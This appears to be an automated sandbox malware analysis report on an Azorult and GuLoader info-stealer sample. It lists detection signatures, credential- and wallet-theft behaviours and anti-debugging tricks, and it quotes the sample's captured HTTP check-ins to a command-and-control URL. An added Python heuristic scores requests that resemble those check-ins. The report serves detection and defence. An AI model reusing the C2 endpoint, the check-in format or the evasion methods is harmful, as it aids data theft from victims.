
Analysis Report cjwe.exe

Overview

General Information

Sample Name: cjwe.exe
Analysis ID: 289128
MD5: 88bb74f36b0640b2c521ce68d0100e14
SHA1: 0d8a45e3ef1bdd54ac0456970180ff06b641583d
SHA256: 0a9055100b10ba145a65334aa2b316bc30722cd75539c6dcca168da6263040a6
Tags: exe

Detection

Azorult, GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Potential malicious icon found
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Azorult
Yara detected GuLoader
Binary contains a suspicious time stamp
Contains functionality to hide a thread from the debugger
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
Tries to detect Any.run
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file access)
Yara detected VB6 Downloader Generic
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Drops PE files
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
Is looking for software installed on the system
May sleep (evasive loops) to hinder dynamic analysis
PE file contains strange resources
PE file does not import any functions
Queries information about the installed CPU (vendor, model number etc)
Sample file is different than original file name gathered from version info
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Startup

  • System is w10x64
  • cjwe.exe (PID: 6656 cmdline: 'C:\Users\user\Desktop\cjwe.exe' MD5: 88BB74F36B0640B2C521CE68D0100E14)
    • cjwe.exe (PID: 6896 cmdline: 'C:\Users\user\Desktop\cjwe.exe' MD5: 88BB74F36B0640B2C521CE68D0100E14)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source | Rule | Description | Author
00000003.00000003.295447945.000000001F41C000.00000004.00000001.sdmp | JoeSecurity_Azorult_1 | Yara detected Azorult | Joe Security
Process Memory Space: cjwe.exe PID: 6656 | JoeSecurity_VB6DownloaderGeneric | Yara detected VB6 Downloader Generic | Joe Security
Process Memory Space: cjwe.exe PID: 6656 | JoeSecurity_GuLoader | Yara detected GuLoader | Joe Security
Process Memory Space: cjwe.exe PID: 6896 | JoeSecurity_Azorult_1 | Yara detected Azorult | Joe Security

Sigma Overview

No Sigma rule has matched

Signature Overview

AV Detection:

Multi AV Scanner detection for domain / URL
Source: officestore.co.id | Virustotal: Detection: 8%
Multi AV Scanner detection for submitted file
Source: cjwe.exe | Virustotal: Detection: 29%
Source: cjwe.exe | ReversingLabs: Detection: 18%

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic | Snort IDS: 2029467 ET TROJAN Win32/AZORult V3.3 Client Checkin M14 192.168.2.4:49722 -> 103.247.10.55:80
Source: Traffic | Snort IDS: 2029136 ET TROJAN AZORult v3.3 Server Response M1 103.247.10.55:80 -> 192.168.2.4:49722
Source: Joe Sandbox View | IP Address: 103.247.10.55
Source: Joe Sandbox View | ASN Name: RUMAHWEB-AS-IDRumahwebIndonesiaCVID
Source: global traffic | HTTP traffic detected:
  POST /cjj/PL341/index.php HTTP/1.1
  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
  Host: officestore.co.id
  Content-Length: 101
  Cache-Control: no-cache
  Data Raw: 00 00 00 46 70 9d 3b 70 9d 35 14 8b 30 63 ea 26 66 9b 45 70 9c 47 70 9d 3a 70 9d 37 70 9d 32 70 9d 37 70 9d 3a 70 9d 33 70 9d 34 14 8b 31 11 8b 30 6d ef 47 70 9d 3b 70 9d 35 70 9d 34 70 9d 3b 13 8b 31 11 ec 26 66 96 47 14 8b 30 61 8b 30 61 8b 30 61 8b 30 64 8b 31 11 ec 42 11 8b 30 6c ea 41 70 9d 34 14
  Data Ascii: Fp;p50c&fEpGp:p7p2p7p:p3p410mGp;p5p4p;1&fG0a0a0a0d1B0lAp4
Source: global traffic | HTTP traffic detected:
  POST /cjj/PL341/index.php HTTP/1.1
  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
  Host: officestore.co.id
  Content-Length: 124523
  Cache-Control: no-cache
Source: unknown | DNS traffic detected: queries for: onedrive.live.com
Source: unknown | HTTP traffic detected:
  POST /cjj/PL341/index.php HTTP/1.1
  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
  Host: officestore.co.id
  Content-Length: 101
  Cache-Control: no-cache
  Data Raw: 00 00 00 46 70 9d 3b 70 9d 35 14 8b 30 63 ea 26 66 9b 45 70 9c 47 70 9d 3a 70 9d 37 70 9d 32 70 9d 37 70 9d 3a 70 9d 33 70 9d 34 14 8b 31 11 8b 30 6d ef 47 70 9d 3b 70 9d 35 70 9d 34 70 9d 3b 13 8b 31 11 ec 26 66 96 47 14 8b 30 61 8b 30 61 8b 30 61 8b 30 64 8b 31 11 ec 42 11 8b 30 6c ea 41 70 9d 34 14
  Data Ascii: Fp;p50c&fEpGp:p7p2p7p:p3p410mGp;p5p4p;1&fG0a0a0a0d1B0lAp4
Source: cjwe.exe, 00000003.00000003.281820198.000000001E0B8000.00000004.00000001.sdmp, softokn3.dll.3.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: cjwe.exe, 00000003.00000003.281820198.000000001E0B8000.00000004.00000001.sdmp, softokn3.dll.3.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: cjwe.exe, 00000003.00000003.281820198.000000001E0B8000.00000004.00000001.sdmp, softokn3.dll.3.dr | String found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: cjwe.exe, 00000003.00000003.281820198.000000001E0B8000.00000004.00000001.sdmp, softokn3.dll.3.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: cjwe.exe, 00000003.00000003.281820198.000000001E0B8000.00000004.00000001.sdmp, softokn3.dll.3.dr | String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: cjwe.exe, 00000003.00000003.281820198.000000001E0B8000.00000004.00000001.sdmp, softokn3.dll.3.dr | String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: cjwe.exe, 00000003.00000003.281820198.000000001E0B8000.00000004.00000001.sdmp, softokn3.dll.3.dr | String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
Source: cjwe.exe, 00000003.00000003.281820198.000000001E0B8000.00000004.00000001.sdmp, softokn3.dll.3.dr | String found in binary or memory: http://ocsp.digicert.com0C
Source: cjwe.exe, 00000003.00000003.281820198.000000001E0B8000.00000004.00000001.sdmp, softokn3.dll.3.dr | String found in binary or memory: http://ocsp.digicert.com0N
Source: cjwe.exe, 00000003.00000003.281820198.000000001E0B8000.00000004.00000001.sdmp, softokn3.dll.3.dr | String found in binary or memory: http://ocsp.thawte.com0
Source: cjwe.exe, 00000003.00000003.281820198.000000001E0B8000.00000004.00000001.sdmp, softokn3.dll.3.dr | String found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: cjwe.exe, 00000003.00000003.281820198.000000001E0B8000.00000004.00000001.sdmp, softokn3.dll.3.dr | String found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
Source: cjwe.exe, 00000003.00000003.281820198.000000001E0B8000.00000004.00000001.sdmp, softokn3.dll.3.dr | String found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: mozglue.dll.3.dr | String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: cjwe.exe, 00000003.00000003.281820198.000000001E0B8000.00000004.00000001.sdmp, softokn3.dll.3.dr | String found in binary or memory: http://www.mozilla.com0
Source: cjwe.exe, 00000003.00000003.295919347.000000001EC30000.00000004.00000001.sdmp | String found in binary or memory: https://login.live.com/oauth20_authorize.srf
Source: cjwe.exe, 00000003.00000003.295919347.000000001EC30000.00000004.00000001.sdmp | String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: cjwe.exe, 00000003.00000003.281820198.000000001E0B8000.00000004.00000001.sdmp, softokn3.dll.3.dr | String found in binary or memory: https://www.digicert.com/CPS0
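Added example (not part of the Joe Sandbox report and not a reproduction of the ET Snort rules quoted above): a small Python heuristic that parses the raw HTTP request shown in this section and scores the traits visible in it: the MSIE 6.0b user agent, a POST to index.php, Cache-Control: no-cache with no Accept header, and an opaque binary body sent without a Content-Type. The 101-byte body is the Data Raw hex from this report; the request framing, the benign comparison request, www.example.com and the three-trait threshold are constructed assumptions.

```python
"""Heuristic scoring of HTTP requests for Azorult-style check-ins.

Added example: the check-in body is the Data Raw hex captured in this report;
everything else (request framing, benign sample, thresholds) is constructed.
"""
from __future__ import annotations

from dataclasses import dataclass

# 101 bytes, copied from the report's "Data Raw" field of the first POST.
CHECKIN_BODY = bytes.fromhex(
    "00 00 00 46 70 9d 3b 70 9d 35 14 8b 30 63 ea 26 66 9b 45 70 9c 47 70 9d 3a"
    " 70 9d 37 70 9d 32 70 9d 37 70 9d 3a 70 9d 33 70 9d 34 14 8b 31 11 8b 30 6d"
    " ef 47 70 9d 3b 70 9d 35 70 9d 34 70 9d 3b 13 8b 31 11 ec 26 66 96 47 14 8b"
    " 30 61 8b 30 61 8b 30 61 8b 30 64 8b 31 11 ec 42 11 8b 30 6c ea 41 70 9d 34 14"
)

# User agent string seen on both POSTs in this report.
AZORULT_UA = "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)"


def build_request(method: str, path: str, headers: dict[str, str], body: bytes) -> bytes:
    """Assemble a raw HTTP/1.1 request; Content-Length is derived from the body."""
    lines = [f"{method} {path} HTTP/1.1"]
    lines += [f"{name}: {value}" for name, value in headers.items()]
    lines.append(f"Content-Length: {len(body)}")
    return ("\r\n".join(lines) + "\r\n\r\n").encode("latin-1") + body


# Constructed from the headers reported above plus the captured 101-byte body.
CHECKIN_REQUEST = build_request(
    "POST", "/cjj/PL341/index.php",
    {"User-Agent": AZORULT_UA, "Host": "officestore.co.id", "Cache-Control": "no-cache"},
    CHECKIN_BODY,
)

# Constructed benign form post for comparison (hypothetical host and browser UA).
BENIGN_REQUEST = build_request(
    "POST", "/api/search",
    {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0",
     "Host": "www.example.com",
     "Accept": "application/json",
     "Content-Type": "application/x-www-form-urlencoded"},
    b"q=hello&page=1",
)


@dataclass
class HttpRequest:
    method: str
    path: str
    headers: dict[str, str]   # header names lower-cased
    body: bytes


def parse_request(raw: bytes) -> HttpRequest:
    """Split a raw request into request line, headers and body."""
    head, _, body = raw.partition(b"\r\n\r\n")
    request_line, *header_lines = head.decode("latin-1").split("\r\n")
    method, path, _version = request_line.split(" ", 2)
    headers: dict[str, str] = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return HttpRequest(method, path, headers, body)


def score_request(req: HttpRequest) -> list[str]:
    """Return the Azorult-like traits present in the request, one string each."""
    reasons: list[str] = []
    if req.headers.get("user-agent") == AZORULT_UA:
        reasons.append("MSIE 6.0b user agent matching the check-in in this report")
    if req.method == "POST" and req.path.lower().endswith("index.php"):
        reasons.append("POST to index.php")
    if req.headers.get("cache-control", "").lower() == "no-cache" and "accept" not in req.headers:
        reasons.append("Cache-Control: no-cache with no Accept header (browsers send Accept)")
    if req.body:
        if int(req.headers.get("content-length", "-1")) != len(req.body):
            reasons.append("Content-Length does not match body")
        if "content-type" not in req.headers:
            reasons.append("POST body without Content-Type")
        # Count bytes outside printable ASCII, ignoring CR/LF/TAB.
        binary = sum(b < 0x20 or b > 0x7E for b in req.body if b not in b"\r\n\t")
        if req.body.startswith(b"\x00\x00\x00") or binary / len(req.body) > 0.3:
            reasons.append("opaque binary body (length-prefixed/obfuscated, not form or JSON)")
    return reasons


SUSPICIOUS_THRESHOLD = 3  # assumption: three independent traits before alerting


def is_suspicious(raw: bytes) -> bool:
    return len(score_request(parse_request(raw))) >= SUSPICIOUS_THRESHOLD


if __name__ == "__main__":
    for name, raw in (("check-in", CHECKIN_REQUEST), ("benign", BENIGN_REQUEST)):
        print(name, is_suspicious(raw), score_request(parse_request(raw)))
```

The check-in request trips five of the six traits; the benign form post trips none. A Snort rule fires on its own content match, so this scorer is a triage aid for proxy or PCAP review rather than a replacement for the ET signatures listed above.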

System Summary:

Potential malicious icon found
Source: initial sample | Icon embedded in PE file: bad icon match: 20047c7c70f0e004
Source: C:\Users\user\Desktop\cjwe.exe | Code function: 0_2_02230E22 NtSetInformationThread,TerminateProcess,0_2_02230E22
Source: C:\Users\user\Desktop\cjwe.exe | Code function: 0_2_02233CA5 NtResumeThread,0_2_02233CA5
Source: C:\Users\user\Desktop\cjwe.exe | Code function: 0_2_02231691 NtWriteVirtualMemory,LoadLibraryA,0_2_02231691
Source: C:\Users\user\Desktop\cjwe.exe | Code function: 0_2_02230315 EnumWindows,NtSetInformationThread,TerminateProcess,LoadLibraryA,0_2_02230315
Source: C:\Users\user\Desktop\cjwe.exe | Code function: 0_2_02233947 NtProtectVirtualMemory,0_2_02233947
Source: C:\Users\user\Desktop\cjwe.exe | Code function: 0_2_022318AB NtWriteVirtualMemory,0_2_022318AB
Source: C:\Users\user\Desktop\cjwe.exe | Code function: 0_2_02233CDF NtResumeThread,0_2_02233CDF
Source: C:\Users\user\Desktop\cjwe.exe | Code function: 0_2_02231725 NtWriteVirtualMemory,0_2_02231725
Source: C:\Users\user\Desktop\cjwe.exe | Code function: 0_2_02231F34 NtWriteVirtualMemory,0_2_02231F34
Source: C:\Users\user\Desktop\cjwe.exe | Code function: 0_2_02233907 NtProtectVirtualMemory,0_2_02233907
Source: C:\Users\user\Desktop\cjwe.exe | Code function: 0_2_02233D1F NtResumeThread,0_2_02233D1F
Source: C:\Users\user\Desktop\cjwe.exe | Code function: 0_2_02233D6E NtResumeThread,0_2_02233D6E
Source: C:\Users\user\Desktop\cjwe.exe | Code function: 0_2_0223037F NtSetInformationThread,TerminateProcess,0_2_0223037F
Source: C:\Users\user\Desktop\cjwe.exe | Code function: 0_2_02230343 NtSetInformationThread,TerminateProcess,0_2_02230343
Source: cjwe.exe | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: api-ms-win-core-debug-l1-1-0.dll.3.dr | Static PE information: No import functions for PE file found
Source: api-ms-win-core-errorhandling-l1-1-0.dll.3.dr | Static PE information: No import functions for PE file found
Source: api-ms-win-core-datetime-l1-1-0.dll.3.dr | Static PE information: No import functions for PE file found
Source: api-ms-win-core-file-l1-1-0.dll.3.dr | Static PE information: No import functions for PE file found
Source: api-ms-win-core-console-l1-1-0.dll.3.dr | Static PE information: No import functions for PE file found
Source: cjwe.exe, 00000000.00000002.228271974.00000000021D0000.00000002.00000001.sdmp | Binary or memory string: OriginalFilenameuser32j% vs cjwe.exe
Source: cjwe.exe, 00000000.00000000.211238958.0000000000409000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenamesvigersnnernena.exe vs cjwe.exe
Source: cjwe.exe, 00000003.00000003.279829002.000000001F3F8000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameapisetstubj% vs cjwe.exe
Source: cjwe.exe, 00000003.00000003.281820198.000000001E0B8000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenamemozglue.dll0 vs cjwe.exe
Source: cjwe.exe, 00000003.00000003.281820198.000000001E0B8000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenamemsvcp140.dll^ vs cjwe.exe
Source: cjwe.exe, 00000003.00000003.285988114.000000001E3E8000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenamevcruntime140.dll^ vs cjwe.exe
Source: cjwe.exe, 00000003.00000003.282153808.0000000000060000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenamenss3.dll0 vs cjwe.exe
Source: cjwe.exe, 00000003.00000003.281682337.000000001E064000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenamefreebl3.dll0 vs cjwe.exe
Source: cjwe.exe, 00000003.00000003.278970900.000000001F4D0000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameucrtbase.dllj% vs cjwe.exe
Source: cjwe.exe, 00000003.00000003.281497361.000000001F4A4000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenamenssdbm3.dll0 vs cjwe.exe
Source: cjwe.exe, 00000003.00000003.278406007.000000001E40C000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenamesoftokn3.dll0 vs cjwe.exe
Source: cjwe.exe, 00000003.00000000.226973943.0000000000409000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenamesvigersnnernena.exe vs cjwe.exe
Source: cjwe.exe | Binary or memory string: OriginalFilenamesvigersnnernena.exe vs cjwe.exe
Source: C:\Users\user\Desktop\cjwe.exe | Section loaded: crtdll.dll
Source: classification engine | Classification label: mal100.rans.phis.troj.spyw.evad.winEXE@3/48@3/1
Source: C:\Users\user\Desktop\cjwe.exe | Mutant created: \Sessions\1\BaseNamedObjects\AE86A6D5F-9414907A-8AD8678F-B8DA4441-BAD9DB7A
Source: C:\Users\user\Desktop\cjwe.exe | File created: C:\Users\user\AppData\Local\Temp\DD440F6B\
Source: cjwe.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\cjwe.exe | Section loaded: C:\Windows\SysWOW64\msvbvm60.dll
Source: C:\Users\user\Desktop\cjwe.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\Desktop\cjwe.exe | File read: C:\Windows\System32\drivers\etc\hosts (reported 6 times)
Source: cjwe.exe, 00000003.00000003.278406007.000000001E40C000.00000004.00000001.sdmp, softokn3.dll.3.dr | Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: cjwe.exe, 00000003.00000003.282153808.0000000000060000.00000004.00000001.sdmp, nss3.dll.3.dr | Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: cjwe.exe, 00000003.00000003.278406007.000000001E40C000.00000004.00000001.sdmp, softokn3.dll.3.dr | Binary or memory string: SELECT ALL %s FROM %s WHERE id=$ID;
Source: cjwe.exe, 00000003.00000003.278406007.000000001E40C000.00000004.00000001.sdmp, softokn3.dll.3.dr | Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: cjwe.exe, 00000003.00000003.282153808.0000000000060000.00000004.00000001.sdmp, nss3.dll.3.dr | Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: cjwe.exe, 00000003.00000003.282153808.0000000000060000.00000004.00000001.sdmp, nss3.dll.3.dr | Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: cjwe.exe, 00000003.00000003.282153808.0000000000060000.00000004.00000001.sdmp, nss3.dll.3.dr | Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: cjwe.exe, 00000003.00000003.278406007.000000001E40C000.00000004.00000001.sdmp, softokn3.dll.3.dr | Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: cjwe.exe, 00000003.00000003.278406007.000000001E40C000.00000004.00000001.sdmp, softokn3.dll.3.dr | Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: cjwe.exe, 00000003.00000003.278406007.000000001E40C000.00000004.00000001.sdmp, softokn3.dll.3.dr | Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: cjwe.exe, 00000003.00000003.278406007.000000001E40C000.00000004.00000001.sdmp, softokn3.dll.3.dr | Binary or memory string: SELECT ALL id FROM %s;
Source: cjwe.exe, 00000003.00000003.278406007.000000001E40C000.00000004.00000001.sdmp, softokn3.dll.3.dr | Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: cjwe.exe, 00000003.00000003.278406007.000000001E40C000.00000004.00000001.sdmp, softokn3.dll.3.dr | Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: cjwe.exe, 00000003.00000003.282153808.0000000000060000.00000004.00000001.sdmp, nss3.dll.3.dr | Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: cjwe.exe, 00000003.00000003.282153808.0000000000060000.00000004.00000001.sdmp, nss3.dll.3.dr | Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: cjwe.exe, 00000003.00000003.282153808.0000000000060000.00000004.00000001.sdmp, nss3.dll.3.dr | Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: cjwe.exe, 00000003.00000003.282153808.0000000000060000.00000004.00000001.sdmp, nss3.dll.3.dr | Binary or memory string: CREATE TABLE xx( name TEXT, /* Name of table or index */ path TEXT, /* Path to page from root */ pageno INTEGER, /* Page number */ pagetype TEXT, /* 'internal', 'leaf' or 'overflow' */ ncell INTEGER, /* Cells on page (0 for overflow) */ payload INTEGER, /* Bytes of payload on this page */ unused INTEGER, /* Bytes of unused space on this page */ mx_payload INTEGER, /* Largest payload size of all cells */ pgoffset INTEGER, /* Offset of page in file */ pgsize INTEGER, /* Size of the page */ schema TEXT HIDDEN /* Database schema being analyzed */);
Source: cjwe.exe, 00000003.00000003.282153808.0000000000060000.00000004.00000001.sdmp, nss3.dll.3.dr | Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: cjwe.exe, 00000003.00000003.278406007.000000001E40C000.00000004.00000001.sdmp, softokn3.dll.3.dr | Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: cjwe.exe | Virustotal: Detection: 29%
Source: cjwe.exe | ReversingLabs: Detection: 18%
Source: unknown | Process created: C:\Users\user\Desktop\cjwe.exe 'C:\Users\user\Desktop\cjwe.exe'
Source: unknown | Process created: C:\Users\user\Desktop\cjwe.exe 'C:\Users\user\Desktop\cjwe.exe'
Source: C:\Users\user\Desktop\cjwe.exe | Process created: C:\Users\user\Desktop\cjwe.exe 'C:\Users\user\Desktop\cjwe.exe'
Source: C:\Users\user\Desktop\cjwe.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook
Source: Binary string: api-ms-win-crt-locale-l1-1-0.pdb source: cjwe.exe, 00000003.00000003.296245442.000000001EB3C000.00000004.00000001.sdmp, api-ms-win-crt-locale-l1-1-0.dll.3.dr
Source: Binary string: api-ms-win-crt-runtime-l1-1-0.pdb source: cjwe.exe, 00000003.00000003.296245442.000000001EB3C000.00000004.00000001.sdmp, api-ms-win-crt-runtime-l1-1-0.dll.3.dr
Source: Binary string: z:\build\build\src\obj-firefox\mozglue\build\mozglue.pdb source: cjwe.exe, 00000003.00000003.281820198.000000001E0B8000.00000004.00000001.sdmp, mozglue.dll.3.dr
Source: Binary string: z:\build\build\src\obj-firefox\security\nss3.pdb source: cjwe.exe, 00000003.00000003.282153808.0000000000060000.00000004.00000001.sdmp, nss3.dll.3.dr
Source: Binary string: api-ms-win-core-file-l1-2-0.pdb source: cjwe.exe, 00000003.00000003.296245442.000000001EB3C000.00000004.00000001.sdmp, api-ms-win-core-file-l1-2-0.dll.3.dr
Source: Binary string: ucrtbase.pdb source: cjwe.exe, 00000003.00000003.278970900.000000001F4D0000.00000004.00000001.sdmp, ucrtbase.dll.3.dr
Source: Binary string: api-ms-win-core-memory-l1-1-0.pdb source: cjwe.exe, 00000003.00000003.279829002.000000001F3F8000.00000004.00000001.sdmp, api-ms-win-core-memory-l1-1-0.dll.3.dr
Source: Binary string: api-ms-win-core-debug-l1-1-0.pdb source: cjwe.exe, 00000003.00000003.296245442.000000001EB3C000.00000004.00000001.sdmp, api-ms-win-core-debug-l1-1-0.dll.3.dr
Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\freebl\freebl_freebl3\freebl3.pdb source: cjwe.exe, 00000003.00000003.281682337.000000001E064000.00000004.00000001.sdmp, freebl3.dll.3.dr
Source: Binary string: api-ms-win-core-sysinfo-l1-1-0.pdb source: cjwe.exe, 00000003.00000003.296245442.000000001EB3C000.00000004.00000001.sdmp, api-ms-win-core-sysinfo-l1-1-0.dll.3.dr
Source: Binary string: api-ms-win-crt-filesystem-l1-1-0.pdb source: cjwe.exe, 00000003.00000003.296245442.000000001EB3C000.00000004.00000001.sdmp, api-ms-win-crt-filesystem-l1-1-0.dll.3.dr
Source: Binary string: api-ms-win-crt-stdio-l1-1-0.pdb source: cjwe.exe, 00000003.00000003.296245442.000000001EB3C000.00000004.00000001.sdmp, api-ms-win-crt-stdio-l1-1-0.dll.3.dr
Source: Binary string: api-ms-win-core-heap-l1-1-0.pdb source: cjwe.exe, 00000003.00000003.296245442.000000001EB3C000.00000004.00000001.sdmp, api-ms-win-core-heap-l1-1-0.dll.3.dr
Source: Binary string: api-ms-win-core-util-l1-1-0.pdb source: cjwe.exe, 00000003.00000003.296245442.000000001EB3C000.00000004.00000001.sdmp, api-ms-win-core-util-l1-1-0.dll.3.dr
Source: Binary string: api-ms-win-core-synch-l1-1-0.pdb source: cjwe.exe, 00000003.00000003.296245442.000000001EB3C000.00000004.00000001.sdmp, api-ms-win-core-synch-l1-1-0.dll.3.dr
Source: Binary string: api-ms-win-crt-environment-l1-1-0.pdb source: cjwe.exe, 00000003.00000003.296245442.000000001EB3C000.00000004.00000001.sdmp, api-ms-win-crt-environment-l1-1-0.dll.3.dr
Source: Binary string: vcruntime140.i386.pdbGCTL source: cjwe.exe, 00000003.00000003.285988114.000000001E3E8000.00000004.00000001.sdmp, vcruntime140.dll.3.dr
Source: Binary string: z:\build\build\src\obj-firefox\mozglue\build\mozglue.pdb11 source: cjwe.exe, 00000003.00000003.281820198.000000001E0B8000.00000004.00000001.sdmp, mozglue.dll.3.dr
Source: Binary string: api-ms-win-core-errorhandling-l1-1-0.pdb source: cjwe.exe, 00000003.00000003.296245442.000000001EB3C000.00000004.00000001.sdmp, api-ms-win-core-errorhandling-l1-1-0.dll.3.dr
Source: Binary string: api-ms-win-core-processthreads-l1-1-0.pdb source: cjwe.exe, 00000003.00000003.296245442.000000001EB3C000.00000004.00000001.sdmp, api-ms-win-core-processthreads-l1-1-0.dll.3.dr
Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\freebl\freebl_freebl3\freebl3.pdbZZ source: cjwe.exe, 00000003.00000003.281682337.000000001E064000.00000004.00000001.sdmp, freebl3.dll.3.dr
Source: Binary string: api-ms-win-core-console-l1-1-0.pdb source: cjwe.exe, 00000003.00000003.296348263.000000001E7E0000.00000004.00000001.sdmp, api-ms-win-core-console-l1-1-0.dll.3.dr
Source: Binary string: api-ms-win-core-file-l1-1-0.pdb source: cjwe.exe, 00000003.00000003.296245442.000000001EB3C000.00000004.00000001.sdmp, api-ms-win-core-file-l1-1-0.dll.3.dr
Source: Binary string: api-ms-win-crt-private-l1-1-0.pdb source: cjwe.exe, 00000003.00000003.296245442.000000001EB3C000.00000004.00000001.sdmp, api-ms-win-crt-private-l1-1-0.dll.3.dr
Source: Binary string: api-ms-win-crt-convert-l1-1-0.pdb source: cjwe.exe, 00000003.00000003.296245442.000000001EB3C000.00000004.00000001.sdmp, api-ms-win-crt-convert-l1-1-0.dll.3.dr
Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb)) source: cjwe.exe, 00000003.00000003.278406007.000000001E40C000.00000004.00000001.sdmp, softokn3.dll.3.dr
Source: Binary string: msvcp140.i386.pdb source: cjwe.exe, 00000003.00000003.281820198.000000001E0B8000.00000004.00000001.sdmp, msvcp140.dll.3.dr
Source: Binary string: api-ms-win-core-profile-l1-1-0.pdb source: cjwe.exe, 00000003.00000003.296245442.000000001EB3C000.00000004.00000001.sdmp, api-ms-win-core-profile-l1-1-0.dll.3.dr
Source: Binary string: ucrtbase.pdbUGP source: cjwe.exe, 00000003.00000003.278970900.000000001F4D0000.00000004.00000001.sdmp, ucrtbase.dll.3.dr
Source: Binary string: api-ms-win-crt-time-l1-1-0.pdb source: cjwe.exe, 00000003.00000003.296245442.000000001EB3C000.00000004.00000001.sdmp, api-ms-win-crt-time-l1-1-0.dll.3.dr
Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb-- source: cjwe.exe, 00000003.00000003.281497361.000000001F4A4000.00000004.00000001.sdmp, nssdbm3.dll.3.dr
